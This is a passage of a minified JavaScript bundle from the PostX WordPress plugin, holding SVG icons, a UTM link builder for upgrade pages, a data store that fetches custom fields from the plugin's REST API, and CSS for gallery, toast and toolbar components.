13.6681C16.1158 13.9765 15.5227 14.0133 15.0248 13.7645C14.4988 13.5016 14.1665 12.964 14.1665 12.376V9.29101C14.1665 8.70301 14.4988 8.16542 15.0248 7.90253Z",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"})),a.facebook=(0,o.createElement)("svg",{width:"20",height:"20",viewBox:"0 0 20 20",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M4.16667 1.875C2.90101 1.875 1.875 2.90101 1.875 4.16667V15.8333C1.875 17.099 2.90101 18.125 4.16667 18.125H9.51011V12.2281H7.91667V9.86675H9.51011V8.84924C9.51011 6.2191 10.7004 5 13.2825 5C13.7721 5 14.6168 5.09601 14.9624 5.19201V7.33258C14.78 7.31338 14.4632 7.3038 14.0696 7.3038C12.8026 7.3038 12.313 7.78373 12.313 9.03161V9.86675H14.8371L14.4034 12.2281H12.313V18.125H15.8333C17.099 18.125 18.125 17.099 18.125 15.8333V4.16667C18.125 2.90101 17.099 1.875 15.8333 1.875H4.16667Z",fill:"currentColor"})),a.typography=(0,o.createElement)("svg",{viewBox:"0 0 20 20",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("rect",{x:"2.5",y:"2.5",width:"15",height:"15",rx:"1.66667",stroke:"currentColor",strokeWidth:"1.25"}),(0,o.createElement)("path",{d:"M5.83203 7.91671V6.66671C5.83203 6.20647 6.20513 5.83337 6.66536 5.83337H13.332C13.7923 5.83337 14.1654 6.20647 14.1654 6.66671V7.91671M9.9987 5.83337V14.1667M7.91536 14.1667H12.082",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round"})),a.reload=(0,o.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M3.43552 16C4.90822 18.9634 7.96628 21 11.5 21C16.4706 21 20.5 16.9706 20.5 12C20.5 7.02944 16.4706 3 11.5 3C7.96628 3 4.90822 5.03656 3.43552 8M8.5 8.5H3V3",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),a.border=(0,o.createElement)("svg",{viewBox:"0 0 20 20",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M8.33398 2.5H11.6673",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round"}),(0,o.createElement)("path",{d:"M2.5 11.6666L2.5 8.33329",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round"}),(0,o.createElement)("path",{d:"M8.33398 17.5H11.6673",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round"}),(0,o.createElement)("path",{d:"M17.5 11.6666L17.5 8.33329",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round"}),(0,o.createElement)("path",{d:"M5 2.5H4.16667C3.24619 2.5 2.5 3.24619 2.5 4.16667V5",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round"}),(0,o.createElement)("path",{d:"M5 17.5H4.16667C3.24619 17.5 2.5 16.7538 2.5 15.8333V15",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round"}),(0,o.createElement)("path",{d:"M15 2.5H15.8333C16.7538 2.5 17.5 3.24619 17.5 4.16667V5",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round"}),(0,o.createElement)("path",{d:"M15 17.5H15.8333C16.7538 17.5 17.5 16.7538 17.5 15.8333V15",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round"})),a.boxShadow=(0,o.createElement)("svg",{viewBox:"0 0 20 20",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("rect",{x:"2.5",y:"2.5",width:"12.5",height:"12.5",rx:"0.833333",stroke:"currentColor",strokeWidth:"1.25",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M15 5H16.6667C17.1269 5 17.5 5.3731 17.5 5.83333V6.66667",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M5 15V16.6667C5 17.1269 5.3731 17.5 5.83333 17.5H6.66667",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M17.5007 15.8333V16.6666C17.5007 17.1268 17.1276 17.4999 16.6673 17.4999H15.834",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M8.75 17.5H10.2083",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M12.291 17.5H13.7493",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M17.5 8.75V10.2083",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M17.5 12.2916V13.75",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}));const i=a},82044:(e,t,l)=>{"use strict";l.d(t,{Z:()=>a});const o={example:{source:"db-postx-featurename",medium:"block-feature",campaign:"postx-dashboard"},db_hellobar:{source:"db-postx-hellobar",medium:"summer-sale",campaign:"postx-dashboard"},explore_pro_feature:{source:"db-postx-wizard",medium:"explore-features",campaign:"postx-dashboard"},ticket_support:{source:"db-postx-wizard",medium:"ticket-support",campaign:"postx-dashboard"},postx_doc:{source:"db-postx-wizard",medium:"postx-doc",campaign:"postx-dashboard"},addons_popup:{source:"db-postx-addons",medium:"popup",campaign:"postx-dashboard"},builder_popup:{source:"db-postx-builder",medium:"popup-upgrade-pro",campaign:"postx-dashboard"},block_docs:{source:"db-postx-editor",medium:"block-docs",campaign:"postx-dashboard"},blockProFeat:{source:"db-postx-editor",medium:"pro-features",campaign:"postx-dashboard"},blockUpgrade:{source:"db-postx-editor",medium:"block-pro",campaign:"postx-dashboard"},blockPatternPro:{source:"db-postx-editor",medium:"blocks-premade",campaign:"postx-dashboard"},blockProLay:{source:"db-postx-editor",medium:"pro-layout",campaign:"postx-dashboard"},wizardPatternPro:{source:"db-postx-wizard",medium:"core_features-patterns",campaign:"postx-dashboard"},wizardStaterPackPro:{source:"db-postx-wizard",medium:"core_features-SP",campaign:"postx-dashboard"},slider_2:{source:"db-postx-editor",medium:"slider2-pro",campaign:"postx-dashboard"},advanced_search:{source:"db-postx-editor",medium:"adv_search-pro",campaign:"postx-dashboard"},customFont:{source:"db-postx-editor",medium:"custom-font",campaign:"postx-dashboard"},dc:{source:"db-postx-editor",medium:"acf-pro",campaign:"postx-dashboard"},postx_dashboard_settings:{source:"db-postx-setting",medium:"upgrade-pro-sidebar",campaign:"postx-dashboard"},postx_dashboard_tutorials:{source:"db-postx-tutorial",medium:"tutorials-upgrade_to_pro",campaign:"postx-dashboard"},postx_dashboard_tutorialsdocs:{source:"db-postx-tutorial",medium:"tutorials-doc",campaign:"postx-dashboard"},menu_save_temp_pro:{source:"db-postx-save-template",medium:"popup-upgrade",campaign:"postx-dashboard"},settingsFR:{source:"db-postx-setting",medium:"settings-upgrade-pro",campaign:"postx-dashboard"},tutorialsFR:{source:"db-postx-tutorial",medium:"tutorials-FR",campaign:"postx-dashboard"},editor_darklight:{source:"db-postx-editor",medium:"darklight-pro",campaign:"postx-dashboard"},final_hour_sale:{source:"db-postx-hellobar",medium:"final-hour-sale",campaign:"postx-dashboard"},massive_sale:{source:"db-postx-hellobar",medium:"massive-sale",campaign:"postx-dashboard"},flash_sale:{source:"db-postx-hellobar",medium:"flash-sale",campaign:"postx-dashboard"},exclusive_deals:{source:"db-postx-hellobar",medium:"exclusive-deals",campaign:"postx-dashboard"},black_friday_sale:{source:"db-postx-hellobar",medium:"black-friday",campaign:"postx-dashboard"},new_year_sale:{source:"db-postx-hellobar",medium:"new-year-sale",campaign:"postx-dashboard"}},a=e=>{const{url:t,utmKey:l,affiliate:a,hash:i}=e,n=new URL(t||"https://www.wpxpo.com/postx/"),r=o[l];return r&&(n.searchParams.set("utm_source",r.source),n.searchParams.set("utm_medium",r.medium),n.searchParams.set("utm_campaign",r.campaign)),a&&n.searchParams.set("ref",a),i&&(n.hash=i.startsWith("#")?i:`#${i}`),n.toString()}},30319:(e,t,l)=>{"use strict";l.d(t,{$6:()=>r,gH:()=>u}),l(87025);const{createReduxStore:o,register:a,controls:i}=wp.data,n={customFields:{options:{acfFields:[],acfMsg:"",mbFields:[],mbfMsg:"",podsFields:[],podsMsg:"",cMetaFields:[],cMetaMsg:""},hasResolved:!1,error:""},postTypes:[],cfValue:{},siteInfo:{},postInfo:{},authorInfo:{},link:{}},r="ultimate-post/store",s={setCustomFields:e=>({type:"SET_CF",customFields:e}),setCFValue:(e,t,l)=>({type:"SET_CF_VALUE",post_id:e,key:t,value:l}),setSiteInfo:(e,t)=>({type:"SET_SITE_INFO",key:e,value:t}),setPostInfo:(e,t,l)=>({type:"SET_POST_INFO",post_id:e,key:t,value:l}),setAuthorInfo:(e,t,l)=>({type:"SET_AUTHOR_INFO",post_id:e,key:t,value:l}),setPostTypes:e=>({type:"SET_POST_TYPES",postTypes:e}),setLink:(e,t,l)=>({type:"SET_LINK",post_id:e,key:t,value:l}),fetchFromAPI:e=>({type:"FETCH_FROM_API",options:e})},p={*getCustomFields(e={}){try{const t=yield s.fetchFromAPI({path:"ultp/v2/get_custom_fields",method:"POST",data:e});return s.setCustomFields({options:{acfFields:t.data.acf.fields||[],acfMsg:t.data.acf.message||"",cMetaFields:t.data.custom_metas.fields||[],cMetaMsg:t.data.custom_metas.message||"",mbFields:t.data.mb.fields||[],mbMsg:t.data.mb.message||"",podsFields:t.data.pods.fields||[],podsMsg:t.data.pods.message||""},hasResolved:!0,error:""})}catch(e){return s.setCustomFields({...n.customFields,error:e.message})}},*getCFValue(e,t){try{const l=yield s.fetchFromAPI({path:"ultp/v2/get_dynamic_content",method:"POST",data:{post_id:e,key:t,data_type:"cf"}});return s.setCFValue(e,t,l.data)}catch(e){console.log(e)}},*getPostTypes(){try{const e=yield s.fetchFromAPI({path:"ultp/v2/get_dynamic_content",method:"POST",data:{data_type:"post_types"}});return s.setPostTypes(e.data)}catch(e){console.log(e)}},*getSiteInfo(e){try{const t=yield s.fetchFromAPI({path:"ultp/v2/get_dynamic_content",method:"POST",data:{key:e,data_type:"site_info"}});return s.setSiteInfo(e,t.data)}catch(e){console.log(e)}},*getLink(e,t){try{const l=yield s.fetchFromAPI({path:"ultp/v2/get_dynamic_content",method:"POST",data:{post_id:e,key:t,data_type:"link"}});return s.setLink(e,t,l.data)}catch(e){console.log(e)}},*getPostInfo(e,t){try{const l=yield s.fetchFromAPI({path:"ultp/v2/get_dynamic_content",method:"POST",data:{post_id:e,key:t,data_type:"post_info"}});return s.setPostInfo(e,t,l.data)}catch(e){console.log(e)}},*getAuthorInfo(e,t){try{const l=yield s.fetchFromAPI({path:"ultp/v2/get_dynamic_content",method:"POST",data:{post_id:e,key:t,data_type:"author_info"}});return s.setAuthorInfo(e,t,l.data)}catch(e){console.log(e)}}},c={...i,FETCH_FROM_API:e=>wp.apiFetch(e.options)};a(o(r,{reducer:(e=n,t)=>{switch(t.type){case"SET_CF":return{...e,customFields:t.customFields};case"SET_CF_VALUE":return{...e,cfValue:{...e.cfValue,[t.post_id]:{...e.cfValue[t.post_id],[t.key]:t.value}}};case"SET_SITE_INFO":return{...e,siteInfo:{...e.siteInfo,[t.key]:t.value}};case"SET_POST_INFO":return{...e,postInfo:{...e.postInfo,[t.post_id]:{...e.postInfo[t.post_id],[t.key]:t.value}}};case"SET_AUTHOR_INFO":return{...e,authorInfo:{...e.authorInfo,[t.post_id]:{...e.authorInfo[t.post_id],[t.key]:t.value}}};case"SET_POST_TYPES":return{...e,postTypes:t.postTypes};case"SET_LINK":return{...e,link:{...e.link,[t.post_id]:{...e.link[t.post_id],[t.key]:t.value}}};default:return e}},actions:s,selectors:{getCustomFields:e=>e.customFields,getCFValue(e,t,l){var o;return null!==(o=e.cfValue?.[t]?.[l])&&void 0!==o?o:""},getSiteInfo(e,t){var l;return null!==(l=e.siteInfo?.[t])&&void 0!==l?l:""},getPostInfo(e,t,l){var o;return null!==(o=e.postInfo?.[t]?.[l])&&void 0!==o?o:""},getAuthorInfo(e,t,l){var o;return null!==(o=e.authorInfo?.[t]?.[l])&&void 0!==o?o:""},getPostTypes:e=>e.postTypes,getLink(e,t,l){var o;return null!==(o=e.link?.[t]?.[l])&&void 0!==o?o:""}},resolvers:p,controls:c}));const{invalidateResolution:u,invalidateResolutionForStoreSelector:d}=wp.data.dispatch(r)},94184:(e,t)=>{var l;!function(){"use strict";var o={}.hasOwnProperty;function a(){for(var e=[],t=0;t<arguments.length;t++){var l=arguments[t];if(l){var i=typeof l;if("string"===i||"number"===i)e.push(l);else if(Array.isArray(l)){if(l.length){var n=a.apply(null,l);n&&e.push(n)}}else if("object"===i){if(l.toString!==Object.prototype.toString&&!l.toString.toString().includes("[native code]")){e.push(l.toString());continue}for(var r in l)o.call(l,r)&&l[r]&&e.push(r)}}}return e.join(" ")}e.exports?(a.default=a,e.exports=a):void 0===(l=function(){return a}.apply(t,[]))||(e.exports=l)}()},38902:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(8081),a=l.n(o),i=l(23645),n=l.n(i)()(a());n.push([e.id,'.wp-block-ultimate-post-youtube-gallery{margin:0px !important;max-width:100%;margin:0 auto}.ultp-layout-classic>.ultp-ytg-item{position:relative}.ultp-layout-classic>.ultp-ytg-item:first-child{grid-column:1/-1}.ultp-layout-classic>.ultp-ytg-item:first-child .ultp-ytg-video{padding-bottom:0px !important;width:100%}.ultp-layout-classic>.ultp-ytg-item:first-child .ultp-ytg-video img{width:100%}.ultp-layout-classic.ultp-ytg-overlay>.ultp-ytg-item:first-child .ultp-ytg-video{max-width:100% !important}.ultp-layout-classic.ultp-ytg-overlay>.ultp-ytg-item:first-child .ultp-ytg-title{font-size:24px}.ultp-layout-classic.ultp-ytg-overlay>.ultp-ytg-item:first-child .ultp-ytg-description{font-size:14px;line-height:24px}.ultp-layout-classic.ultp-ytg-view-list>div:first-child{flex-direction:column}.ultp-layout-playlist{display:flex;gap:20px;flex-wrap:wrap;margin-bottom:20px;position:relative}.ultp-layout-playlist.ultp-ytg-playlist-sidebar{flex:1;max-width:calc(100% - var(--main-video-width, 65%) - 10px)}.ultp-layout-playlist .ultp-ytg-main{flex:2;min-width:0}.ultp-layout-playlist .ultp-ytg-playlist-sidebar{flex:1;min-width:300px;max-height:inherit}.ultp-layout-playlist .ultp-ytg-playlist-items{overflow-y:auto;border-radius:8px;box-sizing:border-box;height:100%;overflow-y:auto;background-color:#eaeaea}.ultp-layout-playlist .ultp-ytg-playlist-items::-webkit-scrollbar{width:8px}.ultp-layout-playlist .ultp-ytg-playlist-items::-webkit-scrollbar-track{background:#f1f1f1;border-radius:4px}.ultp-layout-playlist .ultp-ytg-playlist-items::-webkit-scrollbar-thumb{background:#888;border-radius:4px}.ultp-layout-playlist .ultp-ytg-playlist-items::-webkit-scrollbar-thumb:hover{background:#555}.ultp-layout-playlist .ultp-ytg-playlist-items .ultp-ytg-playlist-item{display:flex;gap:12px;padding:10px;cursor:pointer;transition:background .3s ease;border-radius:4px}.ultp-layout-playlist .ultp-ytg-playlist-items .ultp-ytg-playlist-item img{width:120px;height:68px;object-fit:cover;border-radius:4px}@media(max-width: 768px){.ultp-layout-playlist{flex-direction:column}.ultp-layout-playlist .ultp-ytg-main,.ultp-layout-playlist .ultp-ytg-playlist-sidebar{width:100%}.ultp-layout-playlist .ultp-ytg-playlist-items{height:400px}}.ultp-layout-playlist .ultp-ytg-playlist-item{display:flex;gap:12px;padding:10px;cursor:pointer;transition:background .3s ease;border-radius:2px}.ultp-layout-playlist .ultp-ytg-playlist-item img{width:120px;height:68px;object-fit:cover;border-radius:4px}.ultp-layout-playlist .ultp-ytg-playlist-item-content{flex:1;min-width:0}.ultp-layout-playlist .ultp-ytg-playlist-item-title{margin:0 0 5px;overflow:hidden;text-overflow:ellipsis;display:-webkit-box;-webkit-line-clamp:2;-webkit-box-orient:vertical}.ultp-layout-playlist .ultp-ytg-playlist-item-desc{overflow:hidden;text-overflow:ellipsis;display:-webkit-box;-webkit-line-clamp:2;-webkit-box-orient:vertical}.ultp-layout-inline.ultp-ytg-view-list .ultp-ytg-inside{margin-top:0px}.ultp-ytg-overlay.ultp-ytg-view-list .ultp-ytg-inside{position:absolute;top:0px;display:flex;align-items:center;justify-content:end;height:100%;pointer-events:none}.ultp-ytg-overlay.ultp-ytg-view-list .ultp-ytg-content{width:70%}.ultp-ytg-overlay.ultp-ytg-view-list .ultp-ytg-video{max-width:50%}.ultp-ytg-view-list>div{display:flex;gap:20px}.ultp-ytg-view-list>div:first-child{margin-bottom:0px !important}@media(max-width: 768px){.ultp-ytg-view-list>div{flex-direction:column}.ultp-ytg-view-list>div .ultp-ytg-video{flex:none}.ultp-ytg-view-list>div .ultp-ytg-title,.ultp-ytg-view-list>div .ultp-ytg-description{margin-left:0;margin-top:10px}}.ultp-ytg-view-grid{position:relative;width:100%}.ultp-ytg-loadmore-btn{width:fit-content;margin-left:auto;margin-right:auto;transition:.3s;cursor:pointer}.ultp-ytg-item{position:relative;width:100%}.ultp-ytg-item:not(.ultp-ytg-playlist-item){display:flex;flex-direction:column}.ultp-ytg-item .ultp-ytg-video{width:100%;transition:.3s}.ultp-ytg-item.active .ultp-ytg-video{height:100%}.ultp-ytg-item.active .ultp-ytg-video iframe{height:100%}.ultp-ratio-height .ultp-ytg-video{position:relative;height:0;overflow:hidden}.ultp-ratio-height .ultp-ytg-video img{position:absolute;top:0;left:0;width:100%;height:100%;object-fit:cover}@media(max-width: 768px){.ultp-ytg-container.ultp-layout-playlist{flex-direction:column;flex-wrap:nowrap}.ultp-ytg-container.ultp-layout-playlist iframe{min-height:300px}.ultp-ytg-playlist-items{height:400px}}.ultp-ytg-player-container{margin-bottom:20px;width:100%}.ultp-ytg-playlist-item{display:grid;grid-template-columns:120px 1fr;gap:15px;padding:10px;cursor:pointer;transition:background-color .3s ease;border-radius:4px}.ultp-ytg-playlist-item .ultp-ytg-video{position:relative;width:120px;height:67.5px;margin:0}.ultp-ytg-playlist-item .ultp-video-details{flex:1}.ultp-ytg-play-icon{position:absolute;top:50%;left:50%;transform:translate(-50%, -50%);width:40px;height:40px;background:rgba(0,0,0,.7);border-radius:50%;display:flex;align-items:center;justify-content:center}.ultp-ytg-play-icon:before{content:"";width:0;height:0;border-style:solid;border-width:8px 0 8px 12px;border-color:rgba(0,0,0,0) rgba(0,0,0,0) rgba(0,0,0,0) #fff;margin-left:3px}@media(max-width: 768px){.ultp-ytg-playlist-item{grid-template-columns:90px 1fr;gap:10px}.ultp-ytg-playlist-item .ultp-ytg-video{width:90px;height:50.625px}}.ultp-ytg-video{box-sizing:border-box;position:relative}.ultp-ytg-video .ultp-ytg-loading{height:100%;width:100%;display:flex;align-items:center;justify-content:center;position:relative;overflow:hidden;background:#eee}.ultp-ytg-video .ultp-ytg-loading::before{content:"";position:absolute;top:0;bottom:0;right:0;left:0;background:linear-gradient(90deg, #eee, #f5f5f5, #eee);background-size:200% 100%;animation:shimmer 1.2s infinite linear}.ultp-ytg-video img{width:100%;height:100%}.ultp-ytg-video iframe{background-color:#000}.ultp-ytg-video .ultp-ytg-loading{height:100%;min-height:100%}.ultp-ytg-play__icon{position:absolute;width:100%;height:100%;display:flex;align-items:center;justify-content:center;cursor:pointer;background-color:rgba(0,0,0,.53)}.ultp-ytg-playlist-input{max-width:400px;margin:0 auto}.ultp-ytg-playlist-input .components-base-control__label{color:#fff}.ultp-ytg-playlist-input input{padding:20px 20px !important;font-size:15px;font-weight:400;border-radius:4px;border:1px solid #f03}.ultp-ytg-video-wrapper{display:flex;flex-direction:column;height:100%;width:100%}.ultp-ytg-video-wrapper iframe{height:100%}.ultp-ytg-video{width:100%;display:flex;justify-content:center;align-items:center}.ultp-ytg-video.loading-active{height:100%}.ultp-ytg-inside{width:100%}.ultp-ytg-content{width:100%}.ytg-loader{width:35px;height:35px;border-radius:50%;position:relative;animation:rotate 1s linear infinite}.ytg-loader::before{content:"";box-sizing:border-box;position:absolute;inset:0px;border-radius:50%;border:5px solid;animation:prixClipFix 2s linear infinite}@keyframes rotate{100%{transform:rotate(360deg)}}@keyframes prixClipFix{0%{clip-path:polygon(50% 50%, 0 0, 0 0, 0 0, 0 0, 0 0)}25%{clip-path:polygon(50% 50%, 0 0, 100% 0, 100% 0, 100% 0, 100% 0)}50%{clip-path:polygon(50% 50%, 0 0, 100% 0, 100% 100%, 100% 100%, 100% 100%)}75%{clip-path:polygon(50% 50%, 0 0, 100% 0, 100% 100%, 0 100%, 0 100%)}100%{clip-path:polygon(50% 50%, 0 0, 100% 0, 100% 100%, 0 100%, 0 0)}}.ultp-ytg-loading{grid-template-columns:repeat(3, 1fr) !important}.ultp-ytg-loading.gallery-postx .skeleton-box{min-height:auto}.ultp-ytg-playlist-loading{min-height:300px;justify-content:center;display:flex;align-items:center;justify-content:center;width:100%}.ultp-ytg-play__icon.ytg-icon-animation{cursor:pointer;width:50px;height:50px;border-radius:50%;display:flex;align-items:center;justify-content:center;animation:pulse-border 1.2s ease-in infinite}@keyframes pulse-border{0%{box-shadow:0 0 0 10px var(--ultp-pulse-color)}70%{box-shadow:0 0 0 25px rgba(255,67,142,0)}100%{box-shadow:0 0 0 10px rgba(255,67,142,0)}}.postx-page .ultp-ytg-loading.gallery-postx.gallery-active{position:static !important}.postx-page .ultp-ytg-container:has(>div.ultp-ytg-loading.gallery-postx.gallery-active){display:block !important}.ultp-ytg-error{padding:40px;text-align:center;background-color:#eee;font-size:16px;color:#000;font-weight:500;border:2px solid #224efe;border-radius:5px}.ultp-ytg-error .ultp-ytg-error-message{font-size:12px;font-weight:400;text-transform:capitalize;font-style:italic;display:flex;justify-content:center;gap:8px}.ultp-ytg-error .ultp-field-wrap.ultp-field-groupbutton{max-width:400px;margin:0 auto}.ultp-ytg-error .ultp-field-wrap.ultp-field-groupbutton input{text-align:center}.ultp-ytg-error-dev-api-message{text-align:center;margin:25px;color:red;font-size:16px;font-weight:500}.ultp-ytg-content .ultp-ytg-title a{color:#000}.ultp-layout-inline.ultp-ytg-overlay .ultp-ytg-item.active .ultp-ytg-inside,.ultp-layout-classic.ultp-ytg-overlay .ultp-ytg-item.active .ultp-ytg-inside{display:none}.ultp-layout-inline.ultp-ytg-overlay .ultp-ytg-title a,.ultp-layout-classic.ultp-ytg-overlay .ultp-ytg-title a{color:#fff}.ultp-layout-inline.ultp-ytg-overlay .ultp-ytg-inside,.ultp-layout-classic.ultp-ytg-overlay .ultp-ytg-inside{position:absolute;top:0px;display:flex;align-items:flex-end;justify-content:center;height:100%;pointer-events:none;width:100%}.ultp-ytg-card .ultp-ytg-title a{color:#000}.ultp-youtube-dev-api-key{text-align:center;display:block;font-size:13px;font-weight:500;padding:16px 0px;background:#eef4fa}',""]);const r=n},30439:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(8081),a=l.n(o),i=l(23645),n=l.n(i)()(a());n.push([e.id,".toastMessages{display:flex;flex-direction:column;gap:10px;padding:10px;position:fixed;right:400px;z-index:1001;top:70px}.toast{position:absolute}.toaster{position:fixed;visibility:hidden;width:345px;background-color:#fefefe;height:76px;border-radius:4px;box-shadow:0px 0px 4px #9f9f9f;display:flex;align-items:center}.toaster span{display:block}.toaster .itmCenter{font-size:14px}.toaster .itmLast{padding:0 15px;margin-left:auto;height:100%;display:flex;align-items:center;border-left:1px solid #f2f2f2}.toaster .itmLast:hover{cursor:pointer;background-color:#f2f2f2}.toaster.show{visibility:visible;-webkit-animation:fadeinmessage .7s;animation:fadeinmessage .7s}@keyframes fadeinmessage{from{right:0;opacity:0}to{right:65px;opacity:1}}.circle{stroke-dasharray:166;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;color:#7ac142;fill:none;animation:strokemessage .6s cubic-bezier(0.65, 0, 0.45, 1) forwards}.animation{width:45px;height:45px;border-radius:50%;display:block;stroke-width:2;margin:10px;color:#fff;stroke-miterlimit:10;box-shadow:inset 0px 0px 0px #7ac142;animation:fillmessage .4s ease-in-out .4s forwards,scalemessage .3s ease-in-out .9s both;margin-right:10px}.check{transform-origin:50% 50%;stroke-dasharray:48;stroke-dashoffset:48;animation:strokemessage .3s cubic-bezier(0.65, 0, 0.45, 1) .8s forwards}.cross{color:red;fill:red}@keyframes strokemessage{100%{stroke-dashoffset:0}}@keyframes scalemessage{0%,100%{transform:none}50%{transform:scale3d(1.1, 1.1, 1)}}@keyframes fillmessage{100%{box-shadow:inset 0px 0px 0px 30px #7ac142}}",""]);const r=n},11211:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(8081),a=l.n(o),i=l(23645),n=l.n(i)()(a());n.push([e.id,'.ultp_skeleton__image{height:300px;width:300px;border-radius:4px}.ultp_skeleton__circle{height:300px;width:300px;border-radius:50%}.ultp_skeleton__title{height:20px;width:100%;border-radius:4px}.ultp_skeleton__button{height:40px;width:90px;border-radius:4px}.ultp_frequency{position:relative;background-color:#e2e2e2;overflow:hidden}.ultp_frequency.loop{margin-bottom:10px}.ultp_frequency.loop:last-child{margin-bottom:0}.ultp_frequency::after{display:block;content:"";position:absolute;width:100%;height:100%;transform:translateX(-100%);background:-webkit-gradient(linear, left top, right top, from(transparent), color-stop(rgba(255, 255, 255, 0.2)), to(transparent));background:linear-gradient(90deg, transparent, rgba(255, 255, 255, 0.2), transparent);animation:loadings .8s infinite}.skeletonOverflow{overflow:hidden}@keyframes loadings{100%{transform:translateX(100%)}}',""]);const r=n},31022:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(8081),a=l.n(o),i=l(23645),n=l.n(i)()(a());n.push([e.id,'.ultp-toolbar-group{display:flex;position:relative}.ultp-toolbar-group-bg{background-color:#deefff}.ultp-toolbar-group-bg-offset{min-height:100px}.ultp-toolbar-group-bg-offset::before{background-color:#deefff;content:"";position:absolute;top:0;right:0;height:100%;z-index:-1;left:-6px;width:calc(100% - 1px)}.ultp-toolbar-group-text{position:absolute;top:auto !important;bottom:100%;width:calc(100% + 1px);transform:translateX(-1px);text-align:center;background-color:#037fff;padding-block:8px;border-top-left-radius:3px;border-top-right-radius:3px;overflow:hidden}.ultp-toolbar-group-text-inner{font-weight:bolder;color:#fff;text-transform:uppercase}.ultp-toolbar-group-text-bottom{position:absolute;bottom:0px;width:calc(100% + 1px);transform:translateX(-7px);text-align:center;background-color:#037fff;padding-block:7px;overflow:hidden}.ultp-toolbar-group-text-bottom-inner{text-transform:uppercase;font-weight:bolder;font-size:smaller;color:#fff}.ultp-toolbar-text-ticker-wrapper .ultp-toolbar-group-text-inner{display:block;animation:ticker 4s linear infinite;text-wrap:nowrap;width:max-content}@keyframes ticker{0%{transform:translateX(110%)}100%{transform:translateX(-110%)}}.ultp-toolbar-group-block{position:relative}.ultp-toolbar-group-block-overlay{position:absolute;z-index:5;top:0;bottom:0;left:0;right:0;background-color:rgba(224,251,231,.9);display:flex;justify-content:center;align-items:center}.ultp-toolbar-group-block-overlay a{color:#2bb749 !important;font-size:1rem;font-weight:bolder;text-transform:uppercase;text-decoration:none !important}.ultp-toolbar-group-block-placeholder{display:flex;justify-content:center;align-items:center;gap:20px;padding-inline:5px;transform:translateY(50%)}',""]);const r=n},70398:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(8081),a=l.n(o),i=l(23645),n=l.n(i)()(a());n.push([e.id,".ultp-add-dc-button{width:100%;display:flex;align-items:center;justify-content:center;border:1px dashed #757575;padding:5px 10px;border-radius:3px;cursor:pointer;font-size:14px;line-height:normal;background-color:rgba(0,0,0,0);margin-block:10px;pointer-events:all}.ultp-add-dc-button-disabled{color:gray;cursor:not-allowed}.ultp-add-dc-button-top{position:relative;z-index:999999}.ultp-add-dc-button-inverse{color:#fff;border-color:#fff}",""]);const r=n},33099:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(8081),a=l.n(o),i=l(23645),n=l.n(i)()(a());n.push([e.id,".ultp-dynamic-content-wrapper .components-popover__content{min-width:370px;padding:0 !important;border:1px solid #1e1e1e;outline:0 !important}.ultp-dynamic-content-wrapper .components-popover__content::-webkit-scrollbar-track{-webkit-box-shadow:inset 0 0 6px rgba(0,0,0,.3);background-color:#f5f5f5}.ultp-dynamic-content-wrapper .components-popover__content::-webkit-scrollbar{width:3px;background-color:#f5f5f5}.ultp-dynamic-content-wrapper .components-popover__content::-webkit-scrollbar-thumb{background-color:#000;border:2px solid #555}.ultp-dynamic-content-dropdown .components-base-control{margin-bottom:24px !important}.ultp-dynamic-content-dropdown .components-input-control__container{margin-left:auto;max-width:190px !important}.ultp-dynamic-content-dropdown-button{width:100%;justify-content:center}.ultp-dynamic-content-dropdown .components-panel__body{margin-bottom:24px}.ultp-dynamic-content-dropdown .ultp-field-search{display:flex}.ultp-dynamic-content-dropdown .ultp-field-search .ultp-popup-select{width:190px !important}.ultp-richtext-dynamic-content{border-bottom:3px double #037fff}.ultp-dynamic-content-fields{padding:30px 15px 30px 15px}.ultp-dynamic-content-fields .ultp-popup-select{max-width:190px !important;margin-left:auto}.ultp-dynamic-content-fields .ultp-popup-select li,.ultp-dynamic-content-fields .ultp-popup-select .ultp-search-value{font-size:unset}.ultp-dynamic-content-fields .ultp-popup-select ul{max-width:330px;width:max-content;max-height:300px !important}.ultp-dynamic-content-fields .ultp-field-wrap{padding-top:0px !important;padding-bottom:0px !important;margin-bottom:24px 